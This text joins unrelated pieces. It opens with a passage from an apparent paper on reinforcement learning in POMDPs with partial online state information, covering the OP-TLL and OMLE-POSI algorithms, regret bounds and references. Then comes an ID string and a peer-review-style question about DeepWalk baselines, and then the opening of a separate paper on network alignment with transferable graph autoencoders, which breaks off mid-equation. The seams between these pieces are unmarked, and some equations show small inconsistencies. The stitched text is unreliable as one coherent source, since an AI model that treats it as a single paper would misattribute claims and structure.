query, and receives the partial OSI \( \{\phi_i(s^k_h)\}_{i \in \tilde{i}^k_h} \); (step-ii) The agent takes the action \( a^k_h \) and receives the reward \( r_h(\phi_i(s^k_h), a^k_h) \); (step-iii) the next state \( s^{k+1}_h \) is drawn according to probability \( P_h(\cdot|s^k_h, a^k_h) = \prod_{i=1}^d P_{h,i}(\phi_i(\cdot)|\phi_i(s^k_h), a^k_h) \), where the product form indicates that the sub-states have independent transition kernels. This class is motivated by many important practical applications. For example, in classic wireless channel scheduling Zhao et al. (2007); Chen et al. (2008); Ouyang et al. (2015), the condition of each channel could change independently; and in Martian RockSampling Silver & Veness (2010) or autonomous driving Pinto et al. (2018); Jennings & Figliozzi (2019), the condition of each potential rock or path could also change independently. Notably, as we state in Proposition 1, without the partial OSI in step-i of Class 1, even learning under independent sub-states could still be intractable. Proposition 1. (Intractability if not having partial OSI) There exist POMDPs with independent sub-states, such that learning an \( \epsilon \)-optimal policy necessarily requires \( \tilde{\Omega}(A^H/\epsilon^2) \) samples. Remark 2. By replacing partial OSI with noisy observations under certain conditions, POMDPs with independent sub-states could be decoupled into paralleled sub-POMDPs, which may be solved using existing methods. In contrast, the query of the agent for partial OSI in Class 1 couples potential sub-POMDPs together, such that existing solutions do not apply or result in poor performance. Algorithm 1 Optimistic-Pessimistic Two-Layer Learning (OP-TLL) for \( k = 1 : K \) do Step 1: update the weights \( w^k(i) \) and probabilities \( p^k(i) \) according to Eq. (2). for \( h = 1 : H \) do Step-2: choose a sub-state \( i_h^k \) according to probability \( p^k(i) \) and query partial OSI \( \phi_i(s_h^k) \). Step-3: take an action \( a_h^k \) that maximizes the updated Q-value function in Eq. (3). end for end for For Class I, we develop two new near-optimal algorithms. Due to page limits, we focus on the simpler case with \( \tilde{d} = 1 \) in this section, and introduce our results for the more challenging case with \( \tilde{d} > 1 \) in Appendix F. Our new algorithm when \( \tilde{d} = 1 \) is called Optimistic-Pessimistic Two-Layer Learning (OP-TLL). Please see Algorithm 1. At each step \( h \), the optimal policy queries a sub-state \( i \) according to a fixed distribution \( p \), and receives the partial OSI for this queried sub-state. Then, she takes an action according to \( \phi_i(s_h) \). We note that the new challenge here is: how to utilize partial OSI to avoid the intractability issue shown in Proposition 4 and achieve optimality? To address this question, our OP-TLL algorithm contains two critical learning layers that involve our two new ideas, and obtains a near-optimal regret. Idea-I (Update the query policy pessimistically): This pessimism is because the query policy updated in “Step-1” of Algorithm 1 affects the choice of action \( a_h^k \) in Step-3, which requires complete state information for \( V \)-value estimation. As a result of this, the relation between the regret and model misspecification error [Jin et al., 2020] indicates a linear-in-K regret if the estimation error due to query is not sufficiently considered. Thus, although the state-transition and reward are stochastic, the query needs to be made sufficiently conservatively. Specifically, at the beginning of each episode \( k \), OP-TLL updates the query policy as follows, \[ w^k(i) = w^{k-1}(i) \cdot e^{\frac{\eta_1}{d} \sum_{h=1}^{H} r_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1})}, \quad \text{and} \quad p^k(i) = \frac{(1-\eta_1)w^k(i)}{\sum_{i'=1}^{d} w^k(i')} + \frac{\eta_1}{d}, \] where the estimated reward \( r_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1}) = r_h(\phi_i(s_h^{k-1}), a_h^{k-1}) \), if \( i = i_h^k \); and \( r_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1}) = 0 \), otherwise. Note that this is a new variant of the importance sampling method, where the new development lies in estimating the reward by exploiting partial OSI. Moreover, \( \eta_1 \) is a key parameter that determines how pessimistic the algorithm is. For example, with a smaller \( \eta_1 \), the term \( e^{\frac{\eta_1}{d} \sum_{h=1}^{H} r_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1})} \) increases more slowly. As a result, the weight \( w^K(i) \) increases more slowly, and thus the algorithm behaves more pessimistically. In “Step-2”, OP-TLL chooses the query according to probability \( p^k(i) \), where the first term \( \frac{w^k(i)}{\sum_{i'=1}^{d} w^k(i')} \) captures the query importance of sub-state \( i \) among all sub-states. Idea-II (Update the action policy optimistically): The intuition for this optimism is to minimize the bias in reward estimates, which is critical because the query policy updated in Step-1 relies on the estimated reward. Specifically, in “Step-3”, OP-TLL takes an action that maximizes the \( Q \)-value function following the optimism-in-face-of-uncertainty principle (the new challenge here is how to design the bonus term to address the impact of partial OSI), \[ Q_h^k(\phi_i(s), a) = \min\{r_h(\phi_i(s), a) + [P_h^kV_h^k](\phi_i(s), a) + O(\sqrt{H^2/N_h^k(\phi_i(s), a))}, H\}, \] where \( P_h^k(\phi_i(s')|\phi_i(s), a) = \frac{N_h^k(\phi_i(s'), a, \phi_i(s'))}{N_h^k(\phi_i(s), a)} \) is the estimated transition kernel, \( N_h^k(\phi_i(s), a) \) and \( N_h^k(\phi_i(s'), a, \phi_i(s')) \) are the number of times \( (\phi_i(s), a) \) and \( (\phi_i(s'), a, \phi_i(s')) \) have been visited at step \( h \) up to episode \( k \), respectively, and \( V_h^k(\phi_i(s)) = \max_a Q_h^k(\phi_i(s), a) \) is the estimated \( V \)-value. Theorem 2. (Regret) For POMDPs with partial OSI (\( \tilde{d} = 1 \)) and independent sub-states, with probability \( 1 - \delta \) for any \( \delta \in (0, 1) \), the regret of our OP-TLL algorithm with parameter \( \eta_1 = O(\sqrt{\frac{d \ln d}{H^2 R}}) \) can be upper-bounded as follows, \[ \text{Reg}_{\text{OP-TLL}}(K) \leq \tilde{O}\left(AH^3|\mathcal{S}|^2d\sqrt{K}\left(\ln(AH^2|\mathcal{S}|K/\delta)\right)^2\right). \] Algorithm 2 Optimistic Maximum Likelihood Estimation with Partial OSI (OMLE-POSI) **Initialization:** \( \Theta^0 = \{ \theta \in \Theta : \min_{\{h,i\}} \sigma_S(\hat{\Phi}_h) \geq \alpha \} \). **for** \( k = 1 : K \) **do** **Step-1:** estimate the models \( \hat{\theta} \triangleq (\hat{P}, \hat{\Theta}, \hat{\Delta}) \) (including partial emission model) according to \[ \Theta^k = \left\{ \hat{\theta} \in \Theta^0 : \sum_{\tau=1}^{k-1} \log P_{\hat{\theta}}^\tau(\Gamma^\tau) \geq \max_{(p', \hat{\Theta}', \Delta')} \sum_{\tau=1}^{k-1} \log P_{p', \hat{\Theta}', \Delta'}^\tau(\Gamma^\tau) - \beta \right\} \cap \Theta^0. \tag{5} \] **Step-2:** update the joint policy \( \pi^k \triangleq \arg\max_{\pi:\hat{\theta} \in \Theta^k} E_{\pi,\pi_a,\Delta_1,\hat{\theta}}[\sum_{h=1}^H r_h(\phi_i(s^k_h), a^k_h)] \). **for** \( h = 1 : H \) **do** **Step-3:** query the partial OSI \( \{\phi_i(s^k_h)\}_{i \in i^k_h} \) according to the query policy \( \pi_{q,h} \), collect partial noisy observation \( \tilde{o}^k_h \), and then take an action \( a^k_h \) according to the action policy \( \pi_{a,h}^k \). **end for** **end for** Theorem 2 shows that OP-TLL achieves a regret that (i) depends polynomially in all parameters \( A, H, |\bar{S}|, d \) and \( K \), and (ii) depends on \( \sqrt{K} \), which is tight. To the best of our knowledge, this is the first such near-optimal result for POMDPs with partial OSI. Similar to algorithm design, the main difficulty in the proof is how to capture the mutual impact between the query and action policies. Due to page limits, please see Appendix E for details and Appendix F for the case when \( \tilde{d} > 1 \). 5 Optimality under Partial OSI and Partial Noisy Observations In this section, we identify another tractable class (i.e., Class 2 below) of POMDPs with partial OSI, and provide a new near-optimal algorithm. Please see Fig. 1c for a sketch of one step in this class. **Class 2. (POMDPs with partial OSI and partial noisy observations)** At each step, (step-i) the agent actively selects sub-states \( i^k_h \) to query, and receives the partial OSI \( \{\phi_i(s^k_h)\}_{i \in i^k_h} \); (step-ii) the agent receives the partial noisy observation \( \tilde{o}^k_h \) for the other \( d - \tilde{d} \) sub-states that are not queried, where \( \tilde{o}^k_h \) is generated according to the partial emission probability \( \tilde{\Theta}_h^k \left( \cdot | \{\phi_i(s^k_h)\}_{i \notin i^k_h} \right) \). The partial emission matrix \( \tilde{\Theta}_h^k \in \mathbb{R}^{O \times |\bar{S}|^{d-\tilde{d}}} \) satisfies the partially revealing condition: there exists a constant \( \alpha > 0 \), such that \( \sigma_{\bar{S}}(\tilde{\Theta}_h^k) \geq \alpha \) for any sub-states \( i \) and step \( h \), where \( \bar{S} = |\bar{S}|^{d-\tilde{d}} \) and \( \sigma_S(\cdot) \) denotes the \( S \)-th largest singular value of a matrix. Namely, \( \min_{\{h,i\}} \sigma_{\bar{S}}(\tilde{\Theta}_h^k) \geq \alpha \) holds; (step-iii) the agent takes an action \( a^k_h \) and receives the reward \( r_h(\phi_i(s^k_h), a^k_h) \); (step-iv) the next state \( s^k_{h+1} \) is drawn according to the joint transition probability \( P_h(\cdot|s^k_h, a^k_h) \). We note that in classic POMDPs [Chen et al., 2022a; Liu et al., 2022, 2023], the noisy observation is independent of the decisions of the agent. In contrast, in Class 2, at each step, the partial noisy observation \( \tilde{o}^k_h \) depends on the query \( i^k_h \) of the agent. This new dependency results in new non-trivial challenges in both the algorithm design and regret analysis. For clarity, we use \( \Gamma^k_h \triangleq \{i^k_1, \phi_{i^k_1}(s^k_1), \tilde{o}^k_1, a^k_1, ..., i^k_{h-1}, \phi_{i^k_{h-1}}(s^k_{h-1}), \tilde{o}^k_{h-1}, a^k_{h-1}\} \) to denote the feedback (including both the partial OSI \( \Phi^k_h \) and partial noisy observations \( \tilde{o}^k_{1:h-1} \)) in this case. **Remark 3.** The partially revealing condition in step-ii of Class 2 is milder than the weakly revealing condition in Liu et al. [2022] that requires \( \min_{h} \sigma_S(\Theta_h) \geq \alpha \), where \( S = |\bar{S}|^d \) is the total number of states and \( \Theta_h \) is the emission matrix that we introduced in Sec. 2.1. This is because for an \( m \times n \) matrix \( A \) and an \( m \times (n-l) \) sub-matrix \( B \) of \( A \), we have \( \sigma_{i+l}(A) \leq \sigma_i(B) \) [Horn et al., 1994]. **Remark 4.** Without the partially revealing condition in step-ii of Class 2, POMDPs with partial OSI are still intractable in the worst case. This can be shown by letting the partial emission probability \( \tilde{\Theta}_h^i \) of each \( i \) be the same for all possible sub-states \( \{\phi_i(s)\}_{i \notin i} \), and then we can show that learning an \( \epsilon \)-optimal policy in POMDPs with partial OSI still necessarily requires \( \Omega(A^H/\epsilon^2) \) samples. For Class 2, we develop a new near-optimal algorithms (see Algorithm 2), called Optimistic Maximum Likelihood Estimation with Partial OSI (OMLE-POSI). Recall that the new challenges here are: (i) the partial noisy observation $\tilde{o}_h^k$ depends on the query $\tilde{i}_h^k$ of the agent; (ii) the performance of the action policy $\pi_{a,h}$ depends on both the observation $\tilde{o}_h^k$ and query $\tilde{i}_h^k$. Our algorithm is inspired by the idea of OMLE, but extends it to elegantly address the non-trivial joint query policy and action policy optimization. Specifically, OMLE-POSI (in Algorithm 2) differs from OMLE in two aspects. First, in “Step-1”, OMLE-POSI only collects partial noisy observations $\tilde{o}_{1:H}$, which relies on the queries $\tilde{i}_{1:H}$ determined in Step-2. Due to this new relation, in Eq. 5, we design a new bonus term $\beta = O \left( (\tilde{S}|^{2d} A + |\tilde{S}|^{d-\tilde{d}} O) \ln((|\tilde{S}|^{d} A O H K)) \right)$ which depends on the size of the non-queried sub-state space $|\tilde{S}|^{d-\tilde{d}}$, and OMLE-POSI only estimates partial emission model $\tilde{\Theta}$. Second, note that in the joint optimization of “Step-2”, the action policy $\pi_a$ is inherently a function of the query policy $\pi_q$, since the action $a_h^k$ taken according to $\pi_{a,h}$ relies on the observation $\tilde{o}_h^k$, which further depends on the query $\tilde{i}_h^k$ made according to $\pi_{q,h}$. Due to page limits, please see Appendix G for more details. **Theorem 3. (Regret)** For POMDPs with the partial OSI and partially revealing condition, with probability $1 - \delta$, when $|\tilde{S}| > (d/\tilde{d})^2$, the regret of OMLE-POSI can be upper-bounded as follows, $$\text{Reg}_{\text{OMLE-POSI}}(K) \leq \tilde{O} \left( |\tilde{S}|^{2d-\tilde{d}} O A H^4 \sqrt{K(|\tilde{S}|^{2d} A + |\tilde{S}|^{(d-\tilde{d})/2} O)/\alpha^2} \right).$$ (6) Theorem 3 above shows that (i) the regret of OMLE-POSI depends on $\sqrt{K}$, which is tight; (ii) the regret depends polynomially on $A$ and $H$; and (iii) the regret further decreases exponentially as $\tilde{d}$ increases. To the best of our knowledge, this is the first such near-optimal result for POMDPs with partial OSI. Recall that partial OSI affects both the MLE and policy optimization. Thus, the main difficulty in the proof of Theorem 3 is how to capture such new effects. Indeed, directly applying existing observable operator method (OOM) [Jaeger (2000); Liu et al. (2022)] will result in a regret that does not decrease with $\tilde{d}$. Please see Appendix G for our new analytical ideas and the proof. **Theorem 4. (Lower bound)** For POMDPs with the partial online state information and partially revealing condition, the regret of any algorithm $\pi$ can be lower-bounded as follows, $$\text{Reg}^\pi(K) \geq \tilde{\Omega} \left( \sqrt{AH} \cdot |\tilde{S}|^{d/2} \cdot \sqrt{K} \right).$$ (7) Theorem 4 indicates that the dependency on $|\tilde{S}|^{d/2}$ in the regret of OMLE-POSI is necessary. Our key proof idea in Appendix H is to construct a new special state transition, such that even with partial OSI, all combinations of sub-states $\phi_i(s)$ must be explored to achieve a sub-linear regret. We conjecture that a stronger lower bound depending on the query capability would be $\tilde{\Omega} \left( \sqrt{AH} \cdot |\tilde{S}|^{(d-\tilde{d})/2} \cdot \sqrt{K}/\alpha \right)$, and leave this as a future open question. ### 6 DISCUSSION AND CONCLUSION It is worthwhile to draw connection of our POMDP setting with the standard POMDP and general decision making problem. First, our POMDP setting can be placed under the general decision-making setting [Foster et al. (2021); Chen et al. (2022b); Foster et al. (2023)]. However, directly instantiating their result to our Classes 1 and 2 will result in worse regret upper bounds than our results here, which exploit our special problem structure such as the dependency of the action policy $\pi_a$ on the query policy $\pi_q$ for developing more refined bounds. Second, our POMDP setting cannot be placed under the standard POMDP setting [Liu et al. (2022); Chen et al. (2022a)], mainly due to the special sequential structure of the query, observation, action, and reward in our process. More detailed discussion is provided in Appendix B. To conclude, this paper answers a fundamental open question: how much online state information (OSI) is sufficient to achieve tractability in POMDPs? Specifically, we establish a lower bound that reveals a surprising hardness result: unless we have full OSI, we need an exponential complexity to obtain an $\epsilon$-optimal policy for POMDPs. Nonetheless, we identify two novel tractable classes of POMDPs with only partial OSI, which are important in practice. For these two classes, we provide three new RL algorithms, which are shown to be near-optimal by establishing new regret upper and lower bounds. There are several interesting future work. For example, it would be interesting to study the value of partial OSI in more general POMDPs, e.g., with continuous state spaces [Cai et al. (2022); Liu et al. (2023)]. Second, the regret upper and lower bounds that we achieved can be further tightened, e.g., improve the dependency on $d$ and $O$ using ideas from [Chen et al. (2023)]. REFERENCES Alekh Agarwal, Nan Jiang, Sham M Kakade, and Wen Sun. Reinforcement learning: Theory and algorithms. CS Dept., UW Seattle, Seattle, WA, USA, Tech. Rep, pp. 10–4, 2019. Ilge Akkaya, Marcin Andrychowicz, Maciek Chociej, Mateusz Litwin, Bob McGrew, Arthur Petron, Alex Paino, Matthias Plappert, Glenn Powell, Raphael Ribas, et al. Solving rubik’s cube with a robot hand. arXiv preprint arXiv:1910.07113, 2019. Karl Johan Åström. Optimal control of markov processes with incomplete state information. Journal of mathematical analysis and applications, 10(1):174–205, 1965. Alex Ayoub, Zeyu Jia, Csaba Szepesvari, Mengdi Wang, and Lin Yang. Model-based reinforcement learning with value-targeted regression. In International Conference on Machine Learning, pp. 463–474. PMLR, 2020. Mohammad Gheshlaghi Azar, Ian Osband, and Rémi Munos. Minimax regret bounds for reinforcement learning. In International Conference on Machine Learning, pp. 263–272. PMLR, 2017. Yu Bai, Tengyang Xie, Nan Jiang, and Yu-Xiang Wang. Provably efficient q-learning with low switching cost. Advances in Neural Information Processing Systems, 32, 2019. Christopher Berner, Greg Brockman, Brooke Chan, Vicki Cheung, Przemyslaw Debiak, Christy Dennison, David Farhi, Quirin Fischer, Shariq Hashme, Chris Hesse, et al. Dota 2 with large scale deep reinforcement learning. arXiv preprint arXiv:1912.06680, 2019. Qi Cai, Zhuoran Yang, Chi Jin, and Zhaoran Wang. Provably efficient exploration in policy optimization. In International Conference on Machine Learning, pp. 1283–1294. PMLR, 2020. Qi Cai, Zhuoran Yang, and Zhaoran Wang. Reinforcement learning from partial observation: Linear function approximation with provable sample efficiency. In International Conference on Machine Learning, pp. 2485–2522. PMLR, 2022. Fan Chen, Yu Bai, and Song Mei. Partially observable rl with b-stability: Unified structural condition and sharp sample-efficient algorithms. In The Eleventh International Conference on Learning Representations, 2022a. Fan Chen, Song Mei, and Yu Bai. Unified algorithms for rl with decision-estimation coefficients: No-regret, pac, and reward-free learning. arXiv preprint arXiv:2209.11745, 2022b. Fan Chen, Huan Wang, Caiming Xiong, Song Mei, and Yu Bai. Lower bounds for learning in revealing pomdps. arXiv preprint arXiv:2302.01333, 2023. Yunxia Chen, Qing Zhao, and Ananthram Swami. Joint design and separation principle for opportunistic spectrum access in the presence of sensing errors. IEEE Transactions on Information Theory, 54(5):2053–2071, 2008. Yonathan Efroni, Chi Jin, Akshay Krishnamurthy, and Sobhan Miryoosefi. Provable reinforcement learning with a short-term memory. In International Conference on Machine Learning, pp. 5832–5850. PMLR, 2022. Dylan J Foster, Sham M Kakade, Jian Qian, and Alexander Rakhlin. The statistical complexity of interactive decision making. arXiv preprint arXiv:2112.13487, 2021. Dylan J Foster, Noah Golowich, and Yanjun Han. Tight guarantees for interactive decision making with the decision-estimation coefficient. arXiv preprint arXiv:2301.08215, 2023. Noah Golowich, Ankur Moitra, and Dhruv Rohatgi. Planning in observable pomdps in quasipolynomial time. arXiv preprint arXiv:2201.04735, 2022. Milos Hauskrecht. Value-function approximations for partially observable markov decision processes. Journal of artificial intelligence research, 13:33–94, 2000. Milos Hauskrecht and Hamish Fraser. Planning treatment of ischemic heart disease with partially observable markov decision processes. Artificial intelligence in medicine, 18(3):221–244, 2000.
MCUvAc1GTg
While you state DeepWalk to be one of your baseline models, it is absent in Table 3 and only used for subgraph matching in Figure 3. Could you please explain why you choose not to use it for graph matching?
Network Alignment with Transferable Graph Autoencoders Anonymous authors Paper under double-blind review Abstract Network alignment is the task of establishing one-to-one correspondences between the nodes of different graphs and finds a plethora of applications in high-impact domains. However, this task is known to be NP-hard in its general form, and existing algorithms do not scale up as the size of the graphs increases. To tackle both challenges we propose a novel generalized graph autoencoder architecture, designed to extract powerful and robust node embeddings, that are tailored to the alignment task. We prove that the generated embeddings are associated with the eigenvalues and eigenvectors of the graphs and can achieve more accurate alignment compared to classical spectral methods. Our proposed framework also leverages transfer learning and data augmentation to achieve efficient network alignment at a large scale without retraining. Extensive experiments on both network and sub-network alignment with real-world graphs provide corroborating evidence supporting the effectiveness and scalability of the proposed approach. 1 Introduction Network alignment, also known as graph matching, is a classical problem in graph theory, that aims to find node correspondence across different graphs and is vital in a number of high-impact domains (Emmert-Streib et al., 2016). In social networks, for instance, network alignment has been used for user deanonymization (Nilzadeh et al., 2014) and analysis (Ogaard et al., 2013), while in bioinformatics it is a key tool to identify functionalities in protein complexes (Singh et al., 2008), or to identify gene–drug modules (Chen et al., 2018). Graph matching also finds application in computer vision (Conte et al., 2003), sociology (Racz & Sridhar, 2021), or politics (Li et al., 2022), to name a few. Graph matching can be cast as a quadratic assignment problem (QAP), which is in general NP-hard (Koopmans & Beckmann, 1957). Various approaches have been developed to tackle network alignment and can be divided into two main categories; i) optimization algorithms that attempt to approximate the QAP problem by relaxing the combinatorial constraints, ii) embedding methods that approach the problem by implicitly or explicitly generating powerful node embeddings that facilitate the alignment task. Optimization approaches, as (Anstreicher & Brixius, 2001; Vogelstein et al., 2015) employ quadratic programming relaxations, while (Klau, 2009) and (Peng et al., 2010) utilize semidefinite or Lagrangian-based relaxations respectively. Successive convex approximations were also proposed by (Konar & Sidiropoulos, 2020) to handle the QAP. Challenges associated with these methods include high computational cost, infeasible solutions, or nearly optimal initialization requirements. Embedding methods, on the other hand, overcome these challenges, but they usually produce inferior solutions, due to an inherent trade-off between embedding permutation-equivariance and the ability to capture the structural information of the graph. Typical embedding techniques include spectral and factorization methods (Umeyama, 1988; Feizi et al., 2019; Zhang & Tong, 2016; Kanatsoulis & Sidiropoulos, 2022), structural feature engineering methods (Berlingerio et al., 2013; Heimann et al., 2018), and random walk approaches (Perozzi et al., 2014; Grover & Leskovec, 2016a). Recently (Chen et al., 2020; Karakasis et al., 2021) have proposed joint node embedding and network alignment, to overcome these challenges, but these methods do not scale up as the size of the graph increases. Graph Neural Networks (GNNs) are powerful architectures that learn graph representations (embeddings). They have shown state-of-the-art performance in several tasks, including biology (Ganzà et al., 2020; Strokach et al., 2020; Jiang et al., 2021), quantum chemistry (Gilmer et al., 2017), social... networks and recommender systems (Ying et al., 2018; Wu et al., 2020). Recently, Gao et al. (2021a) proposed a GNN approach to match attributed graphs. The method used a joint embedding framework for pairs of graphs and achieved high levels of matching accuracy. However, this method does not scale to large graphs, since training graphs with large sizes is computationally prohibitive. To address these challenges, we propose a novel self-supervised GNN framework to perform network alignment on a large scale. Specifically, we design a generalized transferable graph autoencoder (T-GAE) (shown in Fig. 1), to produce permutation equivariant and highly expressive embeddings, overcoming the challenges of other embedding techniques. T-GAE is trained on multiple graphs and learns node representations which are tailored to perform alignment between nodes of different graphs. The T-GAE representations combine the eigenvectors of the graph in a nonlinear fashion and are provably at least as good in network alignment as certain spectral methods. Additionally, the proposed framework leverages transfer learning and data augmentation to efficiently operate with large graphs. Training is performed with small graphs, in a self-supervised manner, and the trained encoder can be executed on large graphs to tackle network alignment at a large scale. Extensive experiments with real-world benchmarks test the effectiveness and limits of the proposed T-GAE approach in the tasks of graph and sub-graph matching. The experimental results provide corroborating evidence that T-GAE offers an elegant framework for large-scale network alignment. Our contributions are summarized as follows: (C1) We propose T-GAE, a generalized graph autoencoder architecture that can be trained with multiple graphs and produce expressive/permutation equivariant representations, tailored to network alignment. (C2) We draw the connection between T-GAE and spectral methods and prove that T-GAE is at least as good in graph matching as the absolute value of the graph eigenvectors. (C3) We leverage data augmentation and transfer learning, to develop a robust framework that efficiently performs network alignment at a large scale. (C4) We demonstrate the effectiveness and scalability of the proposed T-GAE with real-world, benchmark graphs in challenging graph and sub-graph matching settings. 2 PRELIMINARIES Graphs are represented by \( G := (\mathcal{V}, \mathcal{E}) \), where \( \mathcal{V} = \{1, \ldots, N\} \) is the set of vertices (nodes) and \( \mathcal{E} = \{(v, u)\} \) correspond to edges between pairs of vertices. A graph is represented in a matrix form by a graph operator $S \in \mathbb{R}^{N \times N}$, where $S(i, j)$ quantifies the relation between node $i$ and node $j$ and $N = |V|$ is the total number of vertices. In this work, we use the graph adjacency and normalized graph adjacency. Oftentimes, the nodes of the graph are associated with graph signals or node attributes $X \in \mathbb{R}^{N \times D}$, that encode additional information about the nodes. In this paper, we study both network alignment of graphs with or without attributes. ### 2.1 Network Alignment **Definition 1 (Network Alignment).** Given a pair of graphs $\mathcal{G} := (\mathcal{V}, \mathcal{E})$, $\hat{\mathcal{G}} := (\hat{\mathcal{V}}, \hat{\mathcal{E}})$, with graph adjacencies $S$, $\hat{S}$, network alignment aims to find a bijection $g : \mathcal{V} \rightarrow \hat{\mathcal{V}}$ which minimizes the number of edge disagreements between the two graphs. Formally, the problem can be written as: $$\min_{P \in \mathcal{P}} \| S - P \hat{S} P^T \|_F^2,$$ where $\mathcal{P}$ is the set of permutation matrices. As mentioned in the introduction, network alignment, is equivalent to the QAP, which has been proven to be NP-hard (Koopmans & Beckmann [1957]). ### 2.2 Spectral Decomposition of the Graph A popular approach to tackle network alignment is by learning powerful node embeddings associated with connectivity information in the graph. Network alignment can be achieved by matching the node embeddings of different graphs rather than graph adjacencies, as follows: $$\min_{P \in \mathcal{P}} \| E - P \hat{E} \|_F^2,$$ where $E \in \mathbb{R}^{N \times F}$ is embedding matrix and $E[i, :]$ is the vector representation of node $i$. The optimization problem in (2) is a linear assignment problem and can be optimally solved in $O(N^3)$ by the Hungarian method (Kuhn [1955b]). Simpler sub-optimal alternatives also exist that operate with $O(N^2)$ or $O(N \log(N))$ flops. A question that naturally arises is how to generate powerful node embeddings that capture the network connectivity and also be effective in aligning different graphs. A natural and effective approach is to leverage the spectral decomposition of the graph, $S = V \Lambda V^T$, where $V$ is the orthonormal matrix of the eigenvectors, and $\Lambda$ is the diagonal matrix of corresponding eigenvalues. Note that we assume undirected graphs and thus $S$ is symmetric. Spectral decomposition has been proven to be an efficient approach to generating meaningful node embedding for graph matching (Umeyama [1988] Feizi et al. [2019]). In particular, $E = V$ or $E = V \Lambda$ are node embeddings that capture the network connectivity since they can perfectly reconstruct the graph. However, $V$ is not unique. Thus computing the spectral decomposition of the same graph with node relabelling, $\hat{S} = P S P^T$ is not guaranteed to produce a permuted version of $V$, i.e., $P V$. Even in the case where $S$ does not have repeated eigenvalues $V$ is only unique up to column sign, which prevents effective matching. To overcome the aforementioned uniqueness limitation, one can focus on the top $m$ eigenvectors that correspond to non-repeated eigenvalues in both $S$ and $\hat{S}$ and compute their absolute values. Then network alignment can be cast as: $$\min_{P \in \mathcal{P}} \| |V_m| - P |V_m| \|_F^2,$$ where $V_m \in \mathbb{R}^{N \times m}$ corresponds to the subspace of non-repeated eigenvalues. The formulation in (3) is a similar to the problem solved in (Umeyama [1988]). ### 3 Graph Neural Networks (GNNs) Upper-Bounds Spectral Methods for Network Alignment A GNN is a cascade of layers and performs local, message-passing operations that are usually defined by the following recursive equation: $$x_v^{(l+1)} = g(x_v^{(l)}, f(\{x_u^{(l)} : u \in \mathcal{N}(v)\})),$$ (4) where \( N(v) \) is the neighborhood of vertex \( v \), i.e., \( u \in N(v) \) iff \((u, v) \in E\). The function \( f \) operates on multisets (\(\{\cdot\}\) represents a multiset) and \( f, g \) are ideally injective. Common choices for \( f \) are the summation or mean function, and for \( g \) the linear function, or the multi-layer perceptron (MLP). Overall, the output of the \( L \)-th layer of a GNN is a function \( \phi(X; S, H) : \mathbb{R}^{N \times D} \rightarrow \mathbb{R}^{N \times D_L} \), where \( S \) is the graph operator, and \( H \) is the tensor of the trainable parameters in all \( L \) layers and produces \( D_L \)-dimensional embeddings for the nodes of the graph defined by \( S \). GNNs admit some very valuable properties. First, they are permutation equivariant: **Theorem 3.1** ([Xu et al., 2019b], [Maron et al., 2018]). Let \( \phi(X; S, H) : \mathbb{R}^{N \times D} \rightarrow \mathbb{R}^{N \times D_L} \) be a GNN with parameters \( H \). For \( X = PX \) and \( S = PSP^T \) that correspond to node relabelling according to the permutation matrix \( P \), the output of the GNN takes the form: \[ \tilde{X}^{(L)} = \phi(\tilde{X}; \tilde{S}, H) = P \phi(X; S, H) \] The above property is not satisfied by other spectral methods. GNNs are also stable ([Gama et al., 2020]), transferable ([Ruiz et al., 2020]), and have high expressive power ([Xu et al., 2019b], [Abboud et al., 2021], [Kanatsoulis & Ribeiro, 2022]). ### 3.1 GNNs and Network Alignment To characterize the ability of a GNN to perform network alignment we first point out the GNNs perform nonlinear spectral operations. Details can be found in Appendix B. We can prove that: **Theorem 3.2.** Let \( G, \hat{G} \) be graphs with adjacencies \( S, \hat{S} \) that have non-repeated eigenvalues. Also let \( P^\circ, P^\dagger \) be solutions to the optimization problems in (1) and (3), respectively. Then there exists a GNN \( \phi(X; S, H) : \mathbb{R}^{N \times D} \rightarrow \mathbb{R}^{N \times D_L} \) such that: \[ \| S - P^\circ \hat{S} P^{\circ T} \|_F^2 \leq \| S - P^* \hat{S} P^{* T} \|_F^2 \leq \| S - P^\dagger \hat{S} P^{\dagger T} \|_F^2, \] with \[ P^* = \arg \min_{P \in P} \| \phi(X; S, H) - P \phi(\tilde{X}; \tilde{S}, H) \|_F^2 \] The proof can be found in Appendix C. The assumption that the graph adjacencies have different eigenvalues is not restrictive. Real nonisomorphic graphs have different eigenvalues with very high probability ([Haemers & Spence, 2004]). Theorem 3.2 compares the network alignment power of a GNN with that of a spectral algorithm ([Umeyama, 1988]), that uses the absolute values of graph adjacency eigenvectors to match two different graphs. According to Theorem 3.2, there always exists a GNN that can perform at least as well as the spectral approach. The proof studies a GNN with white random input and measures the variance of the filter output. Then it shows that GNN layers are able to compute the absolute values of the graph adjacency eigenvectors when the adjacency has non-repeated eigenvalues. As a result there always exists a single layer GNN that outputs the same node features as the ones used in [Umeyama, 1988], which concludes our proof. ### 4 Proposed Method We now leverage the favorable properties of GNNs (permutation equivariance, expressivity, and transferability) and design a GNN approach to tackle network alignment at a large-scale. Our approach learns low-dimensional node embeddings (Eq. 4) that enable graph matching via solving the linear assignment in (2) rather than a quadratic assignment problem in (1). In this section, we design a robust GNN framework such that the node embeddings are expressive to accurately match similar nodes and also stable to graph perturbations, so that they yield high-quality network alignment. #### 4.1 Learning Geometry Preserving Embeddings A fundamental property of node embeddings is to preserve the geometry and topological characteristics of the network. This will allow expressive node representations that can effectively approximate the original problem in (1) with the problem in (2). To achieve this goal we leverage an auto-encoder architecture that reconstructs the original graph from the node embeddings. Results on GNN expressivity indicate that this reconstruction is doable under specific conditions (Abboud et al., 2021). To build topology-preserving embeddings we solve the following optimization problem: $$\min_{\mathcal{H}} \ l \left( \rho \left( \phi (X; S, H) \phi (X; S, H)^T \right), S \right),$$ where $l(\cdot)$ is the binary cross entropy (BCE) and $\rho(\cdot)$ is the logistic function. 4.2 LARGE-SCALE NODE REPRESENTATION LEARNING WITH GENERALIZED GRAPH AUTO-ENCODERS The goal of the proposed framework is to learn a function that maps graphs to node representations and effectively match nodes from different graphs. This function is modeled by a GNN encoder $\phi (X; S, H)$, where each layer is described by Eq. 4. The learned encoder should work for a family of training graphs $\{G_0, \ldots, G_t, \ldots, G_I\}$ with a set of adjacency matrices $S = \{S_0, \ldots, S_t, \ldots, S_I\}$, rather than a single graph. So the idea is not to train an auto-encoder on a single graph but train a generalized graph auto-encoder by solving the following optimization problem. $$\min_{\mathcal{H}} \ E \left[ l \left( 